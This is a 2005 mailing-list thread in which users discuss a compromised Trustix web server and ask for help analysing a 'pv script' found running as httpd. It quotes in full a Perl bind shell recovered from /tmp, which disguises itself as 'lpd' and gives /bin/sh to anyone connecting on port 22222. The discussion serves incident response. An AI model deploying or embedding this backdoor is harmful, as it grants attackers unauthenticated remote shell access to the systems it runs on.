Re: pv script attacked?

Wed, 16 Nov 2005 13:27:13 -0800 

On Tue, 15 Nov 2005, Vidar Tyldum Hansen wrote:

>> A friends that have an httpd server based on TSL 2.2 have received this
>> mail:
>>
>> -------------------------------------------
>> Subject: Your_host_have_been_attacked
>>
>> Your host have been attacked by pv script. Look on netstat -anp for
>> process listen on 4123 port
>>
>> -------------------------------------------
>>
>>
>> It tell me that there is a process listing on port 4123 and another on
>> 22222. Stopping httpd and killing the process that own the daemons seems
>> temporarily "solve" the problem.
>> He did that process are owned by httpd.
>> It is now busy in rebuilding a new box where to migrate data, so request
>> me to collect info on the "pv script".
>> Any hints?
>
> Name of process? Where does it live on the filesystem?

I haven't see the server; It tell me that the process is named "perl"
And find a perl script in /tmp

> What does a 'strings filename' reveal?

Can explain this?

> Go through the access-logs for apache. My guess is that there was a
> badly written PHP app on it and that led to remote execution
> vulnerabilities.

Suggested;
Replay: "Yes, but parsing some GB of log without an idea on what exactly 
search ..."

> The fact that all the parasites ran as httpd and not root points very
> hard in that direction.

This is what my friends have found in /tmp :


---------pv2------------------------
#!/usr/bin/perl
use Socket;
$port=22222;
$proto=getprotobyname('tcp');
$cmd="lpd";
$system='/bin/sh';
$0=$cmd;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die
"setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
   open(STDIN, ">&CLIENT");
   open(STDOUT, ">&CLIENT");
   open(STDERR, ">&CLIENT");
   system($system);
   close(STDIN);
   close(STDOUT);
   close(STDERR);
}

------------------------------------

If anyone can translate for poeple that not "speak" enough perl to 
fully understand  ... ;-)


Regards, B.



_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss

Reply via email to